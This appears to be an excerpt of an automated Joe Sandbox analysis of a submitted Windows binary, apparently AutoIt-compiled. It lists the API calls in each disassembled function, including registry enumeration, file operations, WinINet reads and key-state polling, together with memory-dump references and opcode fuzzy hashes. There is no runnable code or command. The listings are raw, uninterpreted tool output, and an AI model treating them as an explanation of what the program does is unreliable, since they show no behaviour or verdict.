                                                                    • API String ID: 3529120543-1011021900
                                                                    • Opcode ID: f35e2821e378fb64ae3af0968a26ab7edec880d30248b9e411d35a1884cd6e7d
                                                                    • Instruction ID: 2d0124c833bce2d89b2855b5b6f8a39ba720617d2794c3338ad1ad3342213d3c
                                                                    • Opcode Fuzzy Hash: f35e2821e378fb64ae3af0968a26ab7edec880d30248b9e411d35a1884cd6e7d
                                                                    • Instruction Fuzzy Hash: 4D219D73224205ABEF104FA8DC80FBB77BDEB59368F108619F958D61A0E771DC91A760
                                                                    APIs
                                                                    • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,00904D1E,009128E9,?,00904CBE,009128E9,009A88B8,0000000C,00904E15,009128E9,00000002), ref: 00904D8D
                                                                    • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00904DA0
                                                                    • FreeLibrary.KERNEL32(00000000,?,?,?,00904D1E,009128E9,?,00904CBE,009128E9,009A88B8,0000000C,00904E15,009128E9,00000002,00000000), ref: 00904DC3
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1743497626.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                    • Associated: 00000000.00000002.1743485787.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743537421.000000000097C000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743537421.00000000009A2000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743568554.00000000009AC000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743580502.00000000009B4000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_8e0000_3HnH4uJtE7.jbxd
                                                                    Similarity
                                                                    • API ID: AddressFreeHandleLibraryModuleProc
                                                                    • String ID: CorExitProcess$mscoree.dll
                                                                    • API String ID: 4061214504-1276376045
                                                                    • Opcode ID: c3ceabb61ff9010c04ecc7de6328c029822298c5aef8496c6e7f48482411b226
                                                                    • Instruction ID: ffffc7d5d35b6daca47e2f7ccd002f83d141fbb79a07c5b35e9585bbda0c1851
                                                                    • Opcode Fuzzy Hash: c3ceabb61ff9010c04ecc7de6328c029822298c5aef8496c6e7f48482411b226
                                                                    • Instruction Fuzzy Hash: DBF044B5654218BFDB115F90DC49B9DBBB9EF84755F440068F909A6290CB305980DBD1
                                                                    APIs
                                                                    • LoadLibraryA.KERNEL32(kernel32.dll,?,?,008E4EDD,?,009B1418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 008E4E9C
                                                                    • GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 008E4EAE
                                                                    • FreeLibrary.KERNEL32(00000000,?,?,008E4EDD,?,009B1418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 008E4EC0
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1743497626.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                    • Associated: 00000000.00000002.1743485787.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743537421.000000000097C000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743537421.00000000009A2000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743568554.00000000009AC000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743580502.00000000009B4000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_8e0000_3HnH4uJtE7.jbxd
                                                                    Similarity
                                                                    • API ID: Library$AddressFreeLoadProc
                                                                    • String ID: Wow64DisableWow64FsRedirection$kernel32.dll
                                                                    • API String ID: 145871493-3689287502
                                                                    • Opcode ID: f87133e4e20f0d6e24875599087c6cc5c28e90ccec15a5d8060f75dd525dc2a5
                                                                    • Instruction ID: 3a7c49da479804d1eb22208e8526c92651fdff3d2d1f22b67394168339ef732f
                                                                    • Opcode Fuzzy Hash: f87133e4e20f0d6e24875599087c6cc5c28e90ccec15a5d8060f75dd525dc2a5
                                                                    • Instruction Fuzzy Hash: EFE08677A195636B93311B266C19A5F6654FFC2F72B054129FC0CD2100DB60CD4195A0
                                                                    APIs
                                                                    • LoadLibraryA.KERNEL32(kernel32.dll,?,?,00923CDE,?,009B1418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 008E4E62
                                                                    • GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 008E4E74
                                                                    • FreeLibrary.KERNEL32(00000000,?,?,00923CDE,?,009B1418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 008E4E87
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1743497626.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                    • Associated: 00000000.00000002.1743485787.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743537421.000000000097C000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743537421.00000000009A2000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743568554.00000000009AC000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743580502.00000000009B4000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_8e0000_3HnH4uJtE7.jbxd
                                                                    Similarity
                                                                    • API ID: Library$AddressFreeLoadProc
                                                                    • String ID: Wow64RevertWow64FsRedirection$kernel32.dll
                                                                    • API String ID: 145871493-1355242751
                                                                    • Opcode ID: 4b9aea0984dafbc5688e3be74f6a1a55233ea88b19c55acdaf3761dac4326d5f
                                                                    • Instruction ID: fca82a301852679e8a2f8e8c6f684d839d8763daa54e53cec73b6b9b7c834c37
                                                                    • Opcode Fuzzy Hash: 4b9aea0984dafbc5688e3be74f6a1a55233ea88b19c55acdaf3761dac4326d5f
                                                                    • Instruction Fuzzy Hash: 09D0C27391A6625746221B266C08D8F6A18FF8AF253894128B80CE2110CF20CD41D5D0
                                                                    APIs
                                                                    • GetCurrentProcessId.KERNEL32 ref: 0096A427
                                                                    • OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 0096A435
                                                                    • GetProcessIoCounters.KERNEL32(00000000,?), ref: 0096A468
                                                                    • CloseHandle.KERNEL32(?), ref: 0096A63D
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1743497626.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                    • Associated: 00000000.00000002.1743485787.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743537421.000000000097C000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743537421.00000000009A2000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743568554.00000000009AC000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743580502.00000000009B4000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_8e0000_3HnH4uJtE7.jbxd
                                                                    Similarity
                                                                    • API ID: Process$CloseCountersCurrentHandleOpen
                                                                    • String ID:
                                                                    • API String ID: 3488606520-0
                                                                    • Opcode ID: c9d60ea8984b627871a9167d17a50900014d0d62999570dc9befa4d51e8fc026
                                                                    • Instruction ID: 2ae8deb4cec532c333b0b8b64543391b2095ea3f466bcbea7ef4e59dcdfef31d
                                                                    • Opcode Fuzzy Hash: c9d60ea8984b627871a9167d17a50900014d0d62999570dc9befa4d51e8fc026
                                                                    • Instruction Fuzzy Hash: 12A16C71604301AFD720DF29D886B2AB7E5EF84714F14885DF59ADB392DBB0EC418B92
                                                                    APIs
                                                                      • Part of subcall function 0094DDE0: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,0094CF22,?), ref: 0094DDFD
                                                                      • Part of subcall function 0094DDE0: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,0094CF22,?), ref: 0094DE16
                                                                      • Part of subcall function 0094E199: GetFileAttributesW.KERNEL32(?,0094CF95), ref: 0094E19A
                                                                    • lstrcmpiW.KERNEL32(?,?), ref: 0094E473
                                                                    • MoveFileW.KERNEL32(?,?), ref: 0094E4AC
                                                                    • _wcslen.LIBCMT ref: 0094E5EB
                                                                    • _wcslen.LIBCMT ref: 0094E603
                                                                    • SHFileOperationW.SHELL32(?,?,?,?,?,?), ref: 0094E650
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1743497626.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                    • Associated: 00000000.00000002.1743485787.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743537421.000000000097C000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743537421.00000000009A2000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743568554.00000000009AC000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743580502.00000000009B4000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_8e0000_3HnH4uJtE7.jbxd
                                                                    Similarity
                                                                    • API ID: File$FullNamePath_wcslen$AttributesMoveOperationlstrcmpi
                                                                    • String ID:
                                                                    • API String ID: 3183298772-0
                                                                    • Opcode ID: 9f6c1766c7a2a44c2da834fc5e14c38b8862c44e0171a55c23eba1802a0cfa4b
                                                                    • Instruction ID: e9473261fdd93ba8545e45f322a37ad79ed80da8d2733ac3c4d63a618d192773
                                                                    • Opcode Fuzzy Hash: 9f6c1766c7a2a44c2da834fc5e14c38b8862c44e0171a55c23eba1802a0cfa4b
                                                                    • Instruction Fuzzy Hash: 415142B25083859FC724EB94D881EDB73ECAFC5344F00492EF589D3191EF74A6888B66
APIs
  • Part of subcall function 008E9CB3: _wcslen.LIBCMT ref: 008E9CBD
  • Part of subcall function 0096C998: CharUpperBuffW.USER32(?,?,?,?,?,?,?,0096B6AE,?,?), ref: 0096C9B5
  • Part of subcall function 0096C998: _wcslen.LIBCMT ref: 0096C9F1
  • Part of subcall function 0096C998: _wcslen.LIBCMT ref: 0096CA68
  • Part of subcall function 0096C998: _wcslen.LIBCMT ref: 0096CA9E
• RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0096BAA5
• RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 0096BB00
• RegEnumKeyExW.ADVAPI32(?,-00000001,?,?,00000000,00000000,00000000,?), ref: 0096BB63
• RegCloseKey.ADVAPI32(?,?), ref: 0096BBA6
• RegCloseKey.ADVAPI32(00000000), ref: 0096BBB3
Memory Dump Source
• Source File: 00000000.00000002.1743497626.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
• Associated: 00000000.00000002.1743485787.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1743537421.000000000097C000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1743537421.00000000009A2000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1743568554.00000000009AC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1743580502.00000000009B4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_8e0000_3HnH4uJtE7.jbxd
Similarity
• API ID: _wcslen$Close$BuffCharConnectEnumOpenRegistryUpper
• String ID:
• API String ID: 826366716-0
• Opcode ID: 4a0f262cdbe0a7194bd35e85f7f8860695b8bfd8e44d0b93b36706eb8d66a3cc
• Instruction ID: 41ffa0ac3c58f5a31d5c35a934f2591b661aa18d6d438e29b8bfcbc774874026
• Opcode Fuzzy Hash: 4a0f262cdbe0a7194bd35e85f7f8860695b8bfd8e44d0b93b36706eb8d66a3cc
• Instruction Fuzzy Hash: 6861A571208241EFD714DF64C490E2ABBE9FF85308F54895DF4998B2A2DB31ED85CB92
APIs
• VariantInit.OLEAUT32(?), ref: 00948BCD
• VariantClear.OLEAUT32 ref: 00948C3E
• VariantClear.OLEAUT32 ref: 00948C9D
• VariantClear.OLEAUT32(?), ref: 00948D10
• VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 00948D3B
Memory Dump Source
• Source File: 00000000.00000002.1743497626.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
• Associated: 00000000.00000002.1743485787.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1743537421.000000000097C000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1743537421.00000000009A2000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1743568554.00000000009AC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1743580502.00000000009B4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_8e0000_3HnH4uJtE7.jbxd
Similarity
• API ID: Variant$Clear$ChangeInitType
• String ID:
• API String ID: 4136290138-0
• Opcode ID: 3cf852498a87d3268a28c43d461dc22e1316ffeb8ae49efcf3658e20dc8faabb
• Instruction ID: ffd74cbd23f28520895da62d29f543abdc9f365aeadb25c0ba12d4846798491c
• Opcode Fuzzy Hash: 3cf852498a87d3268a28c43d461dc22e1316ffeb8ae49efcf3658e20dc8faabb
• Instruction Fuzzy Hash: 3B5166B5A11219EFCB14CF68C884EAAB7F9FF89314B158569E909DB350E730E911CF90
APIs
• GetPrivateProfileSectionW.KERNEL32(00000003,?,00007FFF,?), ref: 00958BAE
• GetPrivateProfileSectionW.KERNEL32(?,00000003,00000003,?), ref: 00958BDA
• WritePrivateProfileSectionW.KERNEL32(?,?,?), ref: 00958C32
• WritePrivateProfileStringW.KERNEL32(00000003,00000000,00000000,?), ref: 00958C57
• WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 00958C5F
Memory Dump Source
• Source File: 00000000.00000002.1743497626.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
• Associated: 00000000.00000002.1743485787.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1743537421.000000000097C000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1743537421.00000000009A2000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1743568554.00000000009AC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1743580502.00000000009B4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_8e0000_3HnH4uJtE7.jbxd
Similarity
• API ID: PrivateProfile$SectionWrite$String
• String ID:
• API String ID: 2832842796-0
• Opcode ID: a1b81c96fc66417708e47e14ad1a956557086d5ef97eb7647e3a113128bb4acf
• Instruction ID: 66eb0723636257dc6f377df85f4e3a44e70e1f3f7b7e059845dac0e0a6d25ba7
• Opcode Fuzzy Hash: a1b81c96fc66417708e47e14ad1a956557086d5ef97eb7647e3a113128bb4acf
• Instruction Fuzzy Hash: 9D516A75A00618AFCB00DF69C881E6EBBF5FF49314F088458E949AB362DB31ED55CB91
APIs
• LoadLibraryW.KERNEL32(?,00000000,?), ref: 00968F40
• GetProcAddress.KERNEL32(00000000,?), ref: 00968FD0
• GetProcAddress.KERNEL32(00000000,00000000), ref: 00968FEC
• GetProcAddress.KERNEL32(00000000,?), ref: 00969032
• FreeLibrary.KERNEL32(00000000), ref: 00969052
  • Part of subcall function 008FF6C9: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,00000000,?,?,?,00951043,?,753CE610), ref: 008FF6E6
  • Part of subcall function 008FF6C9: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,0093FA64,00000000,00000000,?,?,00951043,?,753CE610,?,0093FA64), ref: 008FF70D
Memory Dump Source
• Source File: 00000000.00000002.1743497626.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
• Associated: 00000000.00000002.1743485787.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1743537421.000000000097C000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1743537421.00000000009A2000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1743568554.00000000009AC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1743580502.00000000009B4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_8e0000_3HnH4uJtE7.jbxd
Similarity
• API ID: AddressProc$ByteCharLibraryMultiWide$FreeLoad
• String ID:
• API String ID: 666041331-0
• Opcode ID: 9b530801b5d030da46b6d97ba8388706b7607cea4ced25ca85ea21701ed36ac7
• Instruction ID: 83f33f62c28d1a3d5f42122b8d983ae3e3bb1acf995dca8aa8e669037729f2c8
• Opcode Fuzzy Hash: 9b530801b5d030da46b6d97ba8388706b7607cea4ced25ca85ea21701ed36ac7
• Instruction Fuzzy Hash: F6516C75604245DFCB11DF68C4848AEBBF5FF49314B0481A8E91AAB362DB31ED86CF91
APIs
• SetWindowLongW.USER32(00000002,000000F0,?), ref: 00976C33
• SetWindowLongW.USER32(?,000000EC,?), ref: 00976C4A
• SendMessageW.USER32(00000002,00001036,00000000,?), ref: 00976C73
• ShowWindow.USER32(00000002,00000000,00000002,00000002,?,?,?,?,?,?,?,0095AB79,00000000,00000000), ref: 00976C98
• SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000027,00000002,?,00000001,00000002,00000002,?,?,?), ref: 00976CC7
Memory Dump Source
• Source File: 00000000.00000002.1743497626.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
• Associated: 00000000.00000002.1743485787.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1743537421.000000000097C000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1743537421.00000000009A2000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1743568554.00000000009AC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1743580502.00000000009B4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_8e0000_3HnH4uJtE7.jbxd
Similarity
• API ID: Window$Long$MessageSendShow
• String ID:
• API String ID: 3688381893-0
• Opcode ID: 29518683dc28477fadfdf0618a55f108b876532efad19e263f6d533460b5ab88
• Instruction ID: d8bd65c58a868f4993ae148e7125fd22bf702a0566507ddfe48353d7562d2d2c
• Opcode Fuzzy Hash: 29518683dc28477fadfdf0618a55f108b876532efad19e263f6d533460b5ab88
• Instruction Fuzzy Hash: 5D41E777604504AFD725CF38CD55FA57BA8EB49360F188268FADDA72E0C371AD40DA40
APIs
Memory Dump Source
• Source File: 00000000.00000002.1743497626.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
• Associated: 00000000.00000002.1743485787.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1743537421.000000000097C000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1743537421.00000000009A2000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1743568554.00000000009AC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1743580502.00000000009B4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_8e0000_3HnH4uJtE7.jbxd
Similarity
• API ID: _free
• String ID:
• API String ID: 269201875-0
• Opcode ID: 2b53926a9be1023dda11871d9db60cdd6bd1150319a7a5be4906875e124b4664
• Instruction ID: c5a4f5dcaee2ca2689019592483eb93582e0049e335b730cbc4b0dfc32732bb6
• Opcode Fuzzy Hash: 2b53926a9be1023dda11871d9db60cdd6bd1150319a7a5be4906875e124b4664
• Instruction Fuzzy Hash: E141D472B00208AFCB24EF78C881A9DB7E5EF89314F1545A8E615EB352DB31AD51CB81
APIs
• GetCursorPos.USER32(?), ref: 008F9141
• ScreenToClient.USER32(00000000,?), ref: 008F915E
• GetAsyncKeyState.USER32(00000001), ref: 008F9183
• GetAsyncKeyState.USER32(00000002), ref: 008F919D
Memory Dump Source
• Source File: 00000000.00000002.1743497626.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
• Associated: 00000000.00000002.1743485787.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1743537421.000000000097C000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1743537421.00000000009A2000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1743568554.00000000009AC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1743580502.00000000009B4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_8e0000_3HnH4uJtE7.jbxd
Similarity
• API ID: AsyncState$ClientCursorScreen
• String ID:
• API String ID: 4210589936-0
• Opcode ID: 04dc9d99c4b5fba8118a0285374e87ad2de83079df2cecd65a58c1f06078ff83
• Instruction ID: 372609fdf46f986840249a3f9afecb65ccc7f93b222083d6bb3485594fac30f4
• Opcode Fuzzy Hash: 04dc9d99c4b5fba8118a0285374e87ad2de83079df2cecd65a58c1f06078ff83
• Instruction Fuzzy Hash: B8415F7290C60AFBDF159FA8C844BFEB775FB05324F208229E569A2290C7346990DF91
APIs
• GetInputState.USER32 ref: 009538CB
• TranslateAcceleratorW.USER32(?,00000000,?), ref: 00953922
• TranslateMessage.USER32(?), ref: 0095394B
• DispatchMessageW.USER32(?), ref: 00953955
• PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00953966
Memory Dump Source
• Source File: 00000000.00000002.1743497626.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
• Associated: 00000000.00000002.1743485787.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1743537421.000000000097C000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1743537421.00000000009A2000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1743568554.00000000009AC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1743580502.00000000009B4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_8e0000_3HnH4uJtE7.jbxd
Similarity
• API ID: Message$Translate$AcceleratorDispatchInputPeekState
• String ID:
• API String ID: 2256411358-0
• Opcode ID: b10e136616e899a913842398df942c622b06d3912278e73b646912fe3047a2fc
• Instruction ID: 45bb1d557467f7a6f4c7f71bd1c91995250b20be7c7d213e9c8602aed78f7a02
• Opcode Fuzzy Hash: b10e136616e899a913842398df942c622b06d3912278e73b646912fe3047a2fc
• Instruction Fuzzy Hash: F631E8B051C345DFEB39CB369968BB637ECEB01392F44855DE856C20A0E7B49688DB11
APIs
• InternetQueryDataAvailable.WININET(?,?,00000000,00000000,00000000,?,00000000,?,?,?,0095C21E,00000000), ref: 0095CF38
• InternetReadFile.WININET(?,00000000,?,?), ref: 0095CF6F
• GetLastError.KERNEL32(?,00000000,?,?,?,0095C21E,00000000), ref: 0095CFB4
• SetEvent.KERNEL32(?,?,00000000,?,?,?,0095C21E,00000000), ref: 0095CFC8
• SetEvent.KERNEL32(?,?,00000000,?,?,?,0095C21E,00000000), ref: 0095CFF2
Memory Dump Source
• Source File: 00000000.00000002.1743497626.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
• Associated: 00000000.00000002.1743485787.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1743537421.000000000097C000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1743537421.00000000009A2000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1743568554.00000000009AC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1743580502.00000000009B4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_8e0000_3HnH4uJtE7.jbxd
Similarity
• API ID: EventInternet$AvailableDataErrorFileLastQueryRead
• String ID:
• API String ID: 3191363074-0
• Opcode ID: 1cd7484854b1969efc5471bf559e9391207527e6b17f371804c4e1ba139e5151
• Instruction ID: 508432495633dd653762fe38d44115f80a5e54342a25c66874692da89165a47c
• Opcode Fuzzy Hash: 1cd7484854b1969efc5471bf559e9391207527e6b17f371804c4e1ba139e5151
• Instruction Fuzzy Hash: AF317FB1604305AFDB24DFA6C8849ABBBFDFF04352B10442EF916D2101DB30ED449B60
APIs
• GetWindowRect.USER32(?,?), ref: 00941915
• PostMessageW.USER32(00000001,00000201,00000001), ref: 009419C1
• Sleep.KERNEL32(00000000,?,?,?), ref: 009419C9
• PostMessageW.USER32(00000001,00000202,00000000), ref: 009419DA
• Sleep.KERNEL32(00000000,?,?,?,?), ref: 009419E2
Memory Dump Source
• Source File: 00000000.00000002.1743497626.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
• Associated: 00000000.00000002.1743485787.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1743537421.000000000097C000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1743537421.00000000009A2000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1743568554.00000000009AC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1743580502.00000000009B4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_8e0000_3HnH4uJtE7.jbxd
Similarity
• API ID: MessagePostSleep$RectWindow
• String ID:
• API String ID: 3382505437-0
• Opcode ID: a286c5a6f86b50f3e15dc8a40ad3c192255ce75d9e8dac6e4e6035766e7cafd0
• Instruction ID: fe1e6838e1c0f325e64d3272efd3ff774aba08150a079763539a274a42582389
• Opcode Fuzzy Hash: a286c5a6f86b50f3e15dc8a40ad3c192255ce75d9e8dac6e4e6035766e7cafd0
• Instruction Fuzzy Hash: 7E31C072A14219EFCB04CFA8DD99EDE3BB5EB44315F104229F925AB2D1C7709984DB90
                                                                    APIs
                                                                    • SendMessageW.USER32(?,00001053,000000FF,?), ref: 00975745
                                                                    • SendMessageW.USER32(?,00001074,?,00000001), ref: 0097579D
                                                                    • _wcslen.LIBCMT ref: 009757AF
                                                                    • _wcslen.LIBCMT ref: 009757BA
                                                                    • SendMessageW.USER32(?,00001002,00000000,?), ref: 00975816
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1743497626.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                    • Associated: 00000000.00000002.1743485787.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743537421.000000000097C000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743537421.00000000009A2000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743568554.00000000009AC000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743580502.00000000009B4000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_8e0000_3HnH4uJtE7.jbxd
                                                                    Similarity
                                                                    • API ID: MessageSend$_wcslen
                                                                    • String ID:
                                                                    • API String ID: 763830540-0
                                                                    APIs
                                                                    • GetSysColor.USER32(00000008), ref: 008F98CC
                                                                    • SetTextColor.GDI32(?,?), ref: 008F98D6
                                                                    • SetBkMode.GDI32(?,00000001), ref: 008F98E9
                                                                    • GetStockObject.GDI32(00000005), ref: 008F98F1
                                                                    • GetWindowLongW.USER32(?,000000EB), ref: 008F9952
                                                                    Similarity
                                                                    • API ID: Color$LongModeObjectStockTextWindow
                                                                    • String ID:
                                                                    • API String ID: 1860813098-0
                                                                    APIs
                                                                    • IsWindow.USER32(00000000), ref: 00960951
                                                                    • GetForegroundWindow.USER32 ref: 00960968
                                                                    • GetDC.USER32(00000000), ref: 009609A4
                                                                    • GetPixel.GDI32(00000000,?,00000003), ref: 009609B0
                                                                    • ReleaseDC.USER32(00000000,00000003), ref: 009609E8
                                                                    Similarity
                                                                    • API ID: Window$ForegroundPixelRelease
                                                                    • String ID:
                                                                    • API String ID: 4156661090-0
                                                                    APIs
                                                                    • GetEnvironmentStringsW.KERNEL32 ref: 0091CDC6
                                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0091CDE9
